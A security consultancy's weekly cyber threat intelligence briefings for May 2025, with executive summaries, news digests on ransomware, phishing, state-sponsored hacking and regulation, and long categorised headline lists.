Account Lockout Policy: Setup and Best Practices Explained | TechTarget
Don’t let dormant accounts become a doorway for cyber criminals
96% of IT pros say AI agents are a security risk, but they're deploying them anyway | ZDNET
Why Scamming Can't Be Stopped—But It Can Be Managed - SecurityWeek
48% of security pros are falling behind compliance requirements - Help Net Security
Threat Actors Exploiting DevOps Web Servers Misconfigurations To Deploy Malware
Researchers Bypass Deepfake Detection With Replay Attacks
Agentic AI and the risks of unpredictable autonomy - Help Net Security
DNS Hijacking, A Major Cyber Threat for the UK Government - Infosecurity Magazine
Other News
A comprehensive new guide to today’s hazards | UNDRR
Bitdefender report finds 84% of major attacks now involve legitimate tools - SiliconANGLE
Two thirds of UK consumers are changing online shopping habits due to recent retail cyber attacks
Cyber and digital get over £1bn to enhance UK’s national security | Computer Weekly
UK Defence Review: “Making Britain safer/secure at home, and strong abroad” - EDR Magazine
New spying claims emerge in Silicon Valley corporate espionage scandal
Danish energy sector probes removes concerns about solar involvement – pv magazine International
Cyber Security Needs Satellite Navigation, Not Paper Maps - Security Boulevard
Space assets could be held ransom. Will we have any choice but to pay? - SpaceNews
CISOs Guide to Navigating the 2025 Threat Landscape
The Secret Defence Strategy of Four Critical Industries Combating Advanced Cyber Threats
Vulnerability Management
Filling the Gap with the European Vulnerability Database
Future-ready cyber security: Lessons from the MITRE CVE crisis | CyberScoop
Trump budget proposal would slash more than 1,000 CISA jobs | CyberScoop
Slashing CISA Is a Gift to Our Adversaries
Seven Steps to Building a Mature Vulnerability Management Program - Infosecurity Magazine
Vulnerabilities
Technical Details Published for Critical Cisco IOS XE Vulnerability - SecurityWeek
Two Linux flaws can lead to the disclosure of sensitive data
SentinelOne: Last week’s 7-hour outage caused by software flaw
Google addresses 34 high-severity vulnerabilities in June’s Android security update | CyberScoop
New Chrome Zero-Day Actively Exploited; Google Issues Emergency Out-of-Band Patch
Microsoft ships emergency patch to fix Windows 11 startup failures
Critical 10-Year-Old Roundcube Webmail Bug Allows Authenticated Users Run Malicious Code
Critical Cisco ISE Auth Bypass Flaw Impacts Cloud Deployments on AWS, Azure, and OCI
Questions Swirl Around ConnectWise Flaw Used in Attacks
Hackers are exploiting critical flaw in vBulletin forum software
Qualcomm Fixes 3 Zero-Days Used in Targeted Android Attacks via Adreno GPU
vBulletin Vulnerability Exploited in the Wild - SecurityWeek
HPE Issues Security Patch for StoreOnce Bug Allowing Remote Authentication Bypass
Why SAP security updates are a struggle for large enterprises - Help Net Security
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 30 May 2025
Black Arrow Cyber Threat Intelligence Briefing 30 May 2025:
-New Spear-Phishing Attack Targeting Financial Executives by Deploying Malware
-The Hidden Cyber Risks in Your Executive Team’s Digital Footprint
-Mandatory Ransomware Payment Disclosure Begins in Australia
-Cyber is Now the Top Reputational Risk for Global Firms for 2024/25 per WTW
-Cyber Security Teams Generate Average of $36M in Business Growth
-M&S Boss: I Went into Shock over Cyber Attack
-Cyber Criminals Exploit AI Hype to Spread Ransomware, Malware
-AI Is Perfecting Scam Emails, Making Phishing Hard to Catch
-4.5% of Breaches Now Extend to Fourth Parties
-Any Teenager Can Be a Cyber Attacker Now, Parents Warned
-New Russian State Hacking Group Hits Europe and North America
-DragonForce Engages in "Turf War" for Ransomware Dominance
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
This week’s review highlights the growing risks facing senior executives, with threat actors increasingly targeting C-suite leaders through tailored spear-phishing campaigns and exploiting their digital footprints. A recent study reports cyber risk as the top reputational concern for senior leaders globally, yet most organisations remain unprepared to model the business impact of such events, while the CEO of M&S highlights the personal effects of experiencing a cyber attack. By contrast, we report on a study that has assessed the business value of including cyber security at the outset of business initiatives.
We also report on the evolution of attack tactics, including disguising ransomware and malware as legitimate AI tools, and enabling teenagers with limited technical skills to conduct attacks. The cyber threat landscape remains volatile, with criminal groups exploiting AI hype, expanding supply chain attack vectors, and even competing for dominance amongst their peers.
Finally, Australia now requires companies to report ransomware payments, which we see as part of a growing drive for transparency that builds on current and forthcoming legislation in other jurisdictions.
Black Arrow recommends that business leaders should ensure they perform an objective assessment of their cyber risks, and address those risks through controls across people, operations and technology aligned to a respected framework underpinned by robust governance.
Top Cyber Stories of the Last Week
New Spear-Phishing Attack Targeting Financial Executives by Deploying Malware
A new spear-phishing (highly targeted/individualised phishing) campaign is actively targeting chief financial officers and senior executives in the banking, energy, insurance, and investment sectors across multiple regions, including the UK. The operation impersonates recruitment outreach from a well-known financial firm and uses convincing social engineering to bypass standard security training. The attackers deploy a legitimate remote access tool, blending into normal network activity and complicating detection. The use of custom CAPTCHA and hidden download mechanisms highlights the operation’s sophistication. The campaign’s precise targeting and persistence tactics reflect a well-resourced threat actor likely pursuing long-term strategic access.
https://cybersecuritynews.com/new-spear-phishing-attack-targeting-financial-executives/
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint
Executives and board members are increasingly targeted by cyber criminals due to their extensive digital footprints and access to high-value systems. Public profiles, reused passwords, and personal device use create opportunities for attackers to launch tailored phishing, impersonation, and deepfake scams. Infostealers harvesting login details and cookies from executive endpoints are now sold on dark web markets, sometimes with corporate credentials priced as low as $100. These risks go beyond technical flaws, exposing organisations to reputational and operational damage. Proactive monitoring of executive identities and digital exposure is now critical to reducing breach likelihood and maintaining cyber resilience.
Mandatory Ransomware Payment Disclosure Begins in Australia
Australia has become the first country to mandate the reporting of ransomware payments, requiring private organisations with turnover above AUD $3m to notify authorities within 72 hours of making or learning of a payment. The new measures aim to improve visibility into cyber crime and reduce underreporting, with research showing only one in five victims currently alert authorities. The law also introduces a Cyber Incident Review Board and forthcoming smart device security standards. With global momentum growing, the UK is now consulting on similar ransomware reporting and payment restrictions for critical infrastructure and public sector entities.
https://www.infosecurity-magazine.com/news/ransomware-payment-disclosure/
Cyber is Now the Top Reputational Risk for Global Firms for 2024/25 per WTW
WTW’s latest global survey has found that cyber risk is now the top reputational concern for senior executives, cited by 65% of respondents up from 52% last year. Environmental and governance risks also rose significantly, reflecting growing regulatory pressures. While 94% of organisations now reserve budgets for managing reputational damage, only 11% feel confident in modelling the financial impact of such events. Encouragingly, most firms have formal crisis response teams and conduct regular scenario testing, but the gap between preparedness and risk quantification remains a key challenge for leadership to address in today’s volatile threat landscape.
Cyber Security Teams Generate Average of $36M in Business Growth
An EY global study has found that cyber security teams contribute a median of $36 million in business value per enterprise initiative, yet budget allocations have halved as a percentage of revenue over the past two years. Despite their growing strategic role, only 13% of CISOs are engaged early in key business decisions. The report highlights that when involved from the outset, security leaders accelerate innovation, reduce risk, and strengthen customer trust particularly in AI adoption and market expansion. Organisations recognising this are seeing both enhanced resilience and competitive advantage through secure, business-aligned transformation.
https://www.infosecurity-magazine.com/news/cybersecurity-teams-business-growth/
M&S Boss: I Went into Shock over Cyber Attack
The chief executive of UK retailer Marks & Spencer (M&S) described feeling “in shock” as the company faced a ransomware cyber attack that disrupted payments, digital stock systems and online sales, with losses estimated at £300 million. The incident exposed personal data belonging to staff and millions of customers, prompting warnings about scams and reinforcing the reputational impact. The attack, attributed to human error, highlighted the persistent difficulty in defending against ransomware. The crisis has accelerated M&S’ digital infrastructure overhaul, reducing a planned three-year transformation to just 18 months.
https://www.telegraph.co.uk/business/2025/05/25/ms-boss-i-went-into-shock-over-cyber-attack/
Cyber Criminals Exploit AI Hype to Spread Ransomware, Malware
Cyber criminals are increasingly exploiting public interest in artificial intelligence by disguising ransomware and malware as legitimate AI tools. Recent campaigns have used fake websites and malicious installers claiming to offer free AI services to lure users into downloading harmful software. Victims are targeted through manipulated search engine results and deceptive advertisements. Once installed, these payloads can encrypt data, corrupt systems, or render devices inoperable. Notably, attackers are blending legitimate AI components with malware to evade detection. Organisations are advised to source AI tools only from verified providers and avoid downloading from promoted links or unofficial platforms.
AI Is Perfecting Scam Emails, Making Phishing Hard to Catch
AI-driven tools are transforming phishing scams, making fraudulent emails far harder to detect. Unlike earlier scams with poor grammar and awkward phrasing, messages now appear polished and convincingly mimic trusted brands and individuals, even in niche languages like Icelandic. The FBI estimates email and impersonation frauds generated $16.6 billion last year. Attackers can now rapidly customise scams at scale, embedding into real threads and exploiting lookalike domains. Experts warn traditional awareness training is no longer enough; verifying suspicious messages and using measures like multifactor authentication and password managers are increasingly essential for defence.
https://www.axios.com/2025/05/27/chatgpt-phishing-emails-scam-fraud
4.5% of Breaches Now Extend to Fourth Parties
There has been a sharp rise in supply chain risks, with over a third (35%) of breaches in 2024 linked to third parties, up 6.5% from last year, and 4.5% now involving fourth parties. Nearly half of these third-party breaches stemmed from technology services, though attack surfaces are diversifying. Ransomware operations are increasingly exploiting supply chains, with 41% of attacks originating via third-party vectors. Subsidiaries and acquisitions now account for nearly 12% of third-party breaches, exposing internal blind spots. The findings underscore the urgent need for continuous, real-time monitoring of vendor ecosystems, as traditional periodic assessments are no longer sufficient.
https://www.helpnetsecurity.com/2025/05/27/third-party-breaches-increase/
Any Teenager Can Be a Cyber Attacker Now, Parents Warned
There has been an observed shift in the cyber crime landscape, with younger, less technically skilled individuals now able to participate in serious offences using widely available online tools. Hacking communities such as “the Com” have evolved into organised groups engaging in ransomware, fraud and extortion, with some members living extravagantly on stolen cryptocurrency. The recent cyber attack on UK retailer M&S, linked to this network, could cost the retailer up to £300 million. Authorities warn that parents and organisations alike must be more alert, as cyber crime becomes more accessible, socially driven and increasingly blurred with real-world violence and intimidation.
New Russian State Hacking Group Hits Europe and North America
Microsoft has identified a newly active Russian state-affiliated group, called Void Blizzard or Laundry Bear, targeting government bodies and critical industries across Europe and North America. The group has compromised multiple organisations, including Ukrainian aviation and Dutch police entities, with tactics ranging from password spraying to spear phishing using spoofed authentication pages. Recent campaigns targeted over 20 NGOs with malicious QR codes to harvest credentials. Post-compromise activity includes automated data theft from cloud platforms and access to Microsoft Teams. Intelligence agencies warn that the group is seeking sensitive defence-related information, particularly linked to NATO, EU member states and military support for Ukraine.
https://www.infosecurity-magazine.com/news/russian-state-group-europe-america/
DragonForce Engages in "Turf War" for Ransomware Dominance
Sophos has revealed that the ransomware group DragonForce is engaged in a power struggle with rivals in a bid to dominate the cyber crime landscape. Following a rebrand into a ‘cartel’ model and launch of its white-label ransomware platform, DragonForce has targeted competitors and appears responsible for the sudden outage of a rival group’s infrastructure in March. This internal warfare has disrupted some operations but has not reduced the threat to organisations. Instead, researchers warn it may lead to more unpredictable and opportunistic cyber attacks, requiring businesses to strengthen incident response and threat monitoring capabilities.
https://www.infosecurity-magazine.com/news/dragonforce-turf-war-ransomware/
Governance, Risk and Compliance
Cyber now the top reputational risk for global firms, WTW report finds | Global Reinsurance
Welcome to the age of cyber insecurity in business
M&S boss: I went into shock over cyber attack
Firms Eye Vulnerabilities as Enterprise Cyber Security Risks Surge
4.5% of breaches now extend to fourth parties - Help Net Security
When leaders ignore cyber security rules, the whole system weakens | Computer Weekly
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard
Cyber Security Teams Generate Average of $36M in Business Growth - Infosecurity Magazine
Why Cyber Security Is Shifting From Detection To Performance
Threats
Ransomware, Extortion and Destructive Attacks
DragonForce used MSP's RMM software to distribute ransomware • The Register
DragonForce Engages in "Turf War" for Ransomware Dominance - Infosecurity Magazine
Police Probe Hacking Gang Over Retail Attacks | Silicon UK Tech
Cyber criminals exploit AI hype to spread ransomware, malware
Any teenager can be a cyber attacker now, parents warned
In cyber attacks, humans can be the weakest link
Ransomware, Rewritten: How AI Is Fueling Both Sides of the Fight | MSSP Alert
How CISOs can defend against Scattered Spider ransomware attacks | CSO Online
Silent Ransom Group targeting law firms, the FBI warns
FBI warns of Luna Moth extortion attacks targeting law firms
UK, US Police Target Ransomware Gangs In Latest Action | Silicon
Sophos warns MSPs over DragonForce threat | Microscope
'Everest Group' Extorts Global Orgs via SAP's HR Tool
'Kisses from Prague': The fall of a Russian ransomware giant
The rise and rise of ransomware - Chris Skinner's blog
Ransomware Victims
Police Probe Hacking Gang Over Retail Attacks | Silicon UK Tech
M&S boss: I went into shock over cyber attack
In cyber attacks, humans can be the weakest link
Retail attacks put cyber security in the spotlight | ICAEW
Silent Ransom Group targeting law firms, the FBI warns
FBI warns of Luna Moth extortion attacks targeting law firms
Hackers just hit a $5B hospital empire, demand ransom | Cybernews
Nova Scotia Power Confirms Ransomware Attack, 280k Notified of Data Breach - SecurityWeek
Luxury jet company allegedly faces data breach | Cybernews
Nova Scotia Power confirms it was hit by ransomware
The rise and rise of ransomware - Chris Skinner's blog
Victoria’s Secret Website Taken Offline After Cyber Attack - SecurityWeek
Phishing & Email Based Attacks
How to spot phishing emails now that AI has cleaned up the typos
New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware
'Haozi' Gang Sells Turnkey Phishing Tools to Amateurs
Less than eight percent of top domains implement the toughest DMARC protection
Threat actors abuse Google Apps Script in evasive phishing attacks
Threat Actors Impersonate Fake Docusign Notifications To Steal Corporate Data
Hackers Are Calling Your Office: FBI Alerts Law Firms to Luna Moth's Stealth Phishing Campaign
The rise of AI-driven phishing attacks: A growing threat and the power of smarter defences | Ctech
New Browser Exploit Technique Undermines Phishing Detection - Infosecurity Magazine
New Russian cyber-spy crew Laundry Bear joins the pack • The Register
What to do if your Facebook account has been phished, hacked, stolen
Gone phishing: the rise of retail cyber crime in four charts
‘Secure email’: A losing battle CISOs must give up | CSO Online
Other Social Engineering
In cyber attacks, humans can be the weakest link
Cyber criminals exploit AI hype to spread ransomware, malware
Oversharing online? 5 ways it makes you an easy target for cyber criminals | ZDNET
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard
Can You Identify a Scam Link? Don't Worry, We'll Teach You How - CNET
How well do you know your remote IT worker? - Help Net Security
Employees Searching Payroll Portals on Google Tricked Into Sending Paychecks to Hackers
Hackers Are Calling Your Office: FBI Alerts Law Firms to Luna Moth's Stealth Phishing Campaign
WSJ: US probes fake White House staff plot | Cybernews
Late night cyber attack targets Israelis with fake hostage calls
Fraud, Scams and Financial Crime
Crypto Drainers are Targeting Cryptocurrency Users - Security Boulevard
Can You Identify a Scam Link? Don't Worry, We'll Teach You How - CNET
Digital trust is cracking under the pressure of deepfakes, cyber crime - Help Net Security
Grandpa-conning crook jailed over sugar-coated drug scam • The Register
Public urged to create secret passwords with family and friends to avoid AI-generated scams
Apple Blocks $9 Billion in Fraud Over 5 Years Amid Rising App Store Threats
Employees Searching Payroll Portals on Google Tricked Into Sending Paychecks to Hackers
How CISOs can regain ground in the AI fraud war - Help Net Security
US sanctions firm linked to cyber scams behind $200 million in losses
Artificial Intelligence
How to spot phishing emails now that AI has cleaned up the typos
Cyber criminals exploit AI hype to spread ransomware, malware
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard
Ransomware, Rewritten: How AI Is Fueling Both Sides of the Fight | MSSP Alert
Digital trust is cracking under the pressure of deepfakes, cyber crime - Help Net Security
Cyber criminals Take Advantage of ChatGPT and Other Generative AI Models | Security Magazine
TikTok fans beware - experts warn dangerous malware spread by AI fake videos | TechRadar
How well do you know your remote IT worker? - Help Net Security
Public urged to create secret passwords with family and friends to avoid AI-generated scams
How CISOs can regain ground in the AI fraud war - Help Net Security
Rethinking Data Privacy in the Age of Generative AI
AI forces security leaders to rethink hybrid cloud strategies - Help Net Security
The rise of AI-driven phishing attacks: A growing threat and the power of smarter defences | Ctech
Most AI chatbots devour your user data - these are the worst offenders | ZDNET
Malware
Cyber criminals exploit AI hype to spread ransomware, malware
New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware
SilverRAT Source Code Leaked Online: Here’s What You Need to Know
TikTok fans beware - experts warn dangerous malware spread by AI fake videos | TechRadar
Fake Zenmap, WinMRT sites target IT staff with Bumblebee malware
Hackers Use Fake VPN and Browser NSIS Installers to Deliver Winos 4.0 Malware
Over 70 Malicious npm and VS Code Packages Found Stealing Data and Crypto
Hackers increasingly target UEFI and bootloaders | Cybernews
Don't click on that Facebook ad for a text-to-AI-video tool • The Register
GitHub becomes go-to platform for malware delivery across Europe - Help Net Security
New AyySSHush botnet compromised over 9,000 ASUS routers, adding a persistent SSH backdoor.
Chinese APT41 Exploits Google Calendar for Malware Command-and-Control Operations
Latrodectus malware detected on over 44K IPs | Cybernews
PumaBot Targets Linux Devices in Botnet Campaign
From Infection to Access: A 24-Hour Timeline of a Modern Stealer Campaign
$24 Mln In Cryptocurrency Seized From Russian Malware Network
New Self-Spreading Malware Infects Docker Containers to Mine Dero Cryptocurrency
Bots/Botnets
New AyySSHush botnet compromised over 9,000 ASUS routers, adding a persistent SSH backdoor.
PumaBot Targets Linux Devices in Botnet Campaign
Mobile
Apple Blocks $9 Billion in Fraud Over 5 Years Amid Rising App Store Threats
If You Get This Message On Your Phone It’s An Attack
Internet of Things – IoT
PumaBot Targets Linux Devices in Botnet Campaign
States Have a TP-Link Problem - The National Interest
Data Breaches/Leaks
ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach
NHS trusts in London and Southampton hit by cyber attack
Coinbase and TaskUs hack: How it happened | Fortune Crypto
Hackers claim major French govt email data breach | Cybernews
Adidas Falls Victim to Third-Party Data Breach
Luxury jet company allegedly faces data breach | Cybernews
Organised Crime & Criminal Actors
Cyber crime much bigger than nation-state ops: Daniel • The Register
Any teenager can be a cyber attacker now, parents warned
Russian Government Hackers Caught Buying Passwords from Cyber Criminals - SecurityWeek
$24 Mln In Cryptocurrency Seized From Russian Malware Network
US sanctions firm linked to cyber scams behind $200 million in losses
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Coinbase and TaskUs hack: How it happened | Fortune Crypto
Over 70 Malicious npm and VS Code Packages Found Stealing Data and Crypto
Crypto Drainers are Targeting Cryptocurrency Users - Security Boulevard
Hacker steals $223 million in Cetus Protocol cryptocurrency heist
Dark Partners cyber crime gang fuels large-scale crypto heists
$24 Mln In Cryptocurrency Seized From Russian Malware Network
Insider Risk and Insider Threats
In cyber attacks, humans can be the weakest link
Why layoffs increase cyber security risks - Help Net Security
US intelligence agency employee charged with espionage | AP News
Insurance
Cyber Attack Surge Benefits Insurers, Prompts Rethink on Premiums
Cyber now the top reputational risk for global firms, WTW report finds | Global Reinsurance
What UK retail breaches mean for the global cyber insurance market | Insurance Business America
Supply Chain and Third Parties
DragonForce used MSP's RMM software to distribute ransomware • The Register
ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach
UK: Two NHS trusts hit by cyber attack that exploited Ivanti flaw – DataBreaches.Net
Firms Eye Vulnerabilities as Enterprise Cyber Security Risks Surge
4.5% of breaches now extend to fourth parties - Help Net Security
'Everest Group' Extorts Global Orgs via SAP's HR Tool
Cloud/SaaS
SaaS companies in firing line following Commvault attack • The Register
What Your Traffic Logs Aren't Telling You About Cloud Security - Security Boulevard
AI forces security leaders to rethink hybrid cloud strategies - Help Net Security
Outages
SentinelOne back online after lengthy outage • The Register
Encryption
Experts "deeply concerned" by the EU plan to weaken encryption | TechRadar
Quantum Computing Threat to Cryptography
Linux and Open Source
PumaBot Targets Linux Devices in Botnet Campaign
Passwords, Credential Stuffing & Brute Force Attacks
Russian Government Hackers Caught Buying Passwords from Cyber Criminals - SecurityWeek
Social Media
TikTok fans beware - experts warn dangerous malware spread by AI fake videos | TechRadar
Don't click on that Facebook ad for a text-to-AI-video tool • The Register
Oversharing online? 5 ways it makes you an easy target for cyber criminals | ZDNET
Meta Disrupts Influence Ops Targeting Romania, Azerbaijan, and Taiwan with Fake Personas
What to do if your Facebook account has been phished, hacked, stolen
Regulations, Fines and Legislation
Cyber defence cuts could sap US response to China hacks, insiders say | World | postguam.com
Major conference in San Antonio shelved due to US policy climate
Banks Want SEC to Rescind Cyber Attack Disclosure Requirements
US Government Launches Audit of NIST’s National Vulnerability Database - Infosecurity Magazine
Models, Frameworks and Standards
How FedRAMP Reciprocity Works with Other Frameworks - Security Boulevard
Careers, Working in Cyber and Information Security
Armed forces charity steps in to address cyber mental health crisis | Computer Weekly
Christian Timbers: Cyber Security Executive Pay Up 4.3% in 2025
Cyber Security salaries in 2025: Shifting priorities, rising demand for specialized roles | SC Media
Law Enforcement Action and Take Downs
Latrodectus malware detected on over 44K IPs | Cybernews
UK, US Police Target Ransomware Gangs In Latest Action | Silicon
Grandpa-conning crook jailed over sugar-coated drug scam • The Register
Misinformation, Disinformation and Propaganda
Meta Disrupts Influence Ops Targeting Romania, Azerbaijan, and Taiwan with Fake Personas
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
UK Government invests £1bn to equip the army for cyber war, defence secretary reveals
US intelligence agency employee charged with espionage | AP News
Britain’s new defence pact with the EU
Nation State Actors
Cyber crime much bigger than nation-state ops: Daniel • The Register
Midyear Roundup: Nation-State Cyber Threats in 2025
ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach
US intelligence agency employee charged with espionage | AP News
China
China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure
China hacks show they're 'preparing for war': McMaster • The Register
States Have a TP-Link Problem - The National Interest
Chinese APT41 Exploits Google Calendar for Malware Command-and-Control Operations
Chinese Spies Exploit Ivanti Vulnerabilities Against Critical Sectors - SecurityWeek
Prague blames Beijing for cyber attack on foreign ministry
Chinese Hacking Group 'Earth Lamia' Targets Multiple Industries - SecurityWeek
Cyber defence cuts could sap US response to China hacks, insiders say | World | postguam.com
China, Taiwan trade accusations over cyber attacks | Reuters
Russia
Russian Government Hackers Caught Buying Passwords from Cyber Criminals - SecurityWeek
New Russian state-sponsored APT quickly gains global reach, hitting expansive targets | CyberScoop
New Russian State Hacking Group Hits Europe and North America - Infosecurity Magazine
NCSC pins ‘malicious campaign’ of cyber attacks on Russian military intelligence – PublicTechnology
$24 Mln In Cryptocurrency Seized From Russian Malware Network
Electricity supply emerges as prime cyber attack target – German security agency | Clean Energy Wire
'Kisses from Prague': The fall of a Russian ransomware giant
Russia-Linked Hackers Target Tajikistan Government with Weaponized Word Documents
Russia sentences programmer to 14 years for treason • The Register
Iran
85 Iranian cyber attacks linked to killing plots foiled in 2025, Israel says | Iran International
North Korea
How well do you know your remote IT worker? - Help Net Security
Tools and Controls
DragonForce used MSP's RMM software to distribute ransomware • The Register
ConnectWise Hit by Cyber Attack; Nation-State Actor Suspected in Targeted Breach
Cyber Attack Surge Benefits Insurers, Prompts Rethink on Premiums
Why layoffs increase cyber security risks - Help Net Security
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint - Security Boulevard
Welcome to the age of cyber insecurity in business
US, allies push for immediate SIEM, SOAR implementation | SC Media
Why Cyber Security Is Shifting From Detection To Performance
What is OSINT and why it is so important to fight cyber criminals? | TechRadar
SaaS companies in firing line following Commvault attack • The Register
'Everest Group' Extorts Global Orgs via SAP's HR Tool
Ransomware, Rewritten: How AI Is Fueling Both Sides of the Fight | MSSP Alert
The edge devices security risk: What leaders can do | IT Pro
Less than eight percent of top domains implement the toughest DMARC protection
AI Beats 90% of Human Teams in a Hacking Competition
Why data provenance must anchor every CISO’s AI governance strategy - Help Net Security
Recent Acquisitions Illustrate Consolidation Trends in Cyber Security | MSSP Alert
CISA's New SIEM Guidance Tackles Visibility and Blind Spots
‘Secure email’: A losing battle CISOs must give up | CSO Online
Incident Response Planning - Preparing for Data Breaches
Explaining What’s Happened in a Cyber Attack Is Challenging
Predictive Cyber Risk Analysis Using Aggregated Threat Intelligence
Building resilient cyber threat intelligence communities | Computer Weekly
SentinelOne back online after lengthy outage • The Register
What Your Traffic Logs Aren't Telling You About Cloud Security - Security Boulevard
AI forces security leaders to rethink hybrid cloud strategies - Help Net Security
Hackers claim major French govt email data breach | Cybernews
This National Guard unit went analog to simulate a cyber attack
Cyber security challenges could pave the way to a unified approach
Other News
Electricity supply emerges as prime cyber attack target – German security agency | Clean Energy Wire
Britain’s new defence pact with the EU
Why pilots fear that airplanes will be the next target of cyber hackers
The US Is Building a One-Stop Shop for Buying Your Data | WIRED
94 billion browser cookies sold on Telegram | Cybernews
The Cyber Security Catch That Comes With Free Public Wi-Fi
Banks report growing number of cyber attacks against clients | Radio Prague International
This National Guard unit went analog to simulate a cyber attack
Japan to draw up new cyber security strategy by year-end - Japan Today
Cyber security in mining: protecting infrastructure and digital assets | A&O Shearman - JDSupra
Airplane crash-detection systems could be vulnerable | The Week
Vulnerability Management
China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure
Not Every CVE Deserves a Fire Drill: Focus on What’s Exploitable
CVE Uncertainty Underlines Importance of Cyber Resilience
Firms Eye Vulnerabilities as Enterprise Cyber Security Risks Surge
Hackers increasingly target UEFI and bootloaders | Cybernews
NIST Launches Metric to Measure Likelihood of Vulnerability Exploits - Infosecurity Magazine
New Attack Bypasses HTTP/2 Security for Arbitrary Cross-Site Scripting
Microsoft wants Windows Update to handle all apps | The Verge
Vulnerabilities
China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure
ConnectWise Confirms Hack, “Very Small Number” of Customers Affected - Infosecurity Magazine
Questions mount as Ivanti tackles another round of zero-days | CyberScoop
SaaS companies in firing line following Commvault attack • The Register
Chinese Spies Exploit Ivanti Vulnerabilities Against Critical Sectors - SecurityWeek
UK: Two NHS trusts hit by cyber attack that exploited Ivanti flaw – DataBreaches.Net
Thousands of Asus routers are being hit with stealthy, persistent backdoors - Ars Technica
Cisco security flaw exploited to build botnet of thousands of devices | TechRadar
Chrome 137, Firefox 139 Patch High-Severity Vulnerabilities - SecurityWeek
Over 100,000 WordPress Sites at Risk from Critical CVSS 10.0 Vulnerability in Wishlist Plugin
Apple Safari exposes users to fullscreen browser-in-the-middle attacks
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 23 May 2025
Black Arrow Cyber Threat Intelligence Briefing 25 May 2025:
-M&S IT Contractor ‘Investigating Whether It Was Gateway for Cyber Attack’; M&S Chief Executive Faces £1.1M Pay Hit
-Ransomware Attack on Food Distributor Spells More Pain for UK Supermarkets
-Businesses Ignore Advice on Preventing Cyber Attacks, Says GCHQ
-Executive Complacency Is the Most Dangerous Cyber Threat Today, Warns Insurance VP
-Cyber Security Now HSBC’s Largest Operational Cost
-Best Practices for Board-Level Cyber Security Oversight
-The Importance of Culture in an Effective Cyber Security Programme
-You Do a Fire Drill, so Do a Cyber Attack Drill
-Many Rush into GenAI Deployments, Frequently Without a Security Net
-SMBs Remain Easy Pickings for Cyber Criminals – Here’s Why
-Your Information Was Probably Stolen Again: Researcher Discovers 184 Million Stolen Logins
-Lumma Infostealer Infected About 10 Million Systems Before Global Disruption
-Russia-Linked APT28 Targets Western Logistics Entities and Technology Firms
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
The unfolding story of the recent incidents at the UK retailer Marks & Spencer (M&S) and others gives us insights into the risks faced by organisations in all sectors and locations. It is reported that M&S’ outsourced IT provider is conducting an internal investigation to establish if it was the main cause of the incident which has caused significant harm to the retailer. The Chief Executive of M&S is reported to be facing a loss of £1.1m in remuneration due to the attack, while the UK’s data protection authority is investigating the loss of personal information during the incident.
These factors of supply chain risks, regulatory investigations, and personal losses of senior leadership, remind us of the need for all organisations to properly understand and manage their risks. The newly reported attack on food distributor Peter Green Chilled further highlights the need for robust due diligence and embedding cyber security requirements in supplier relationships.
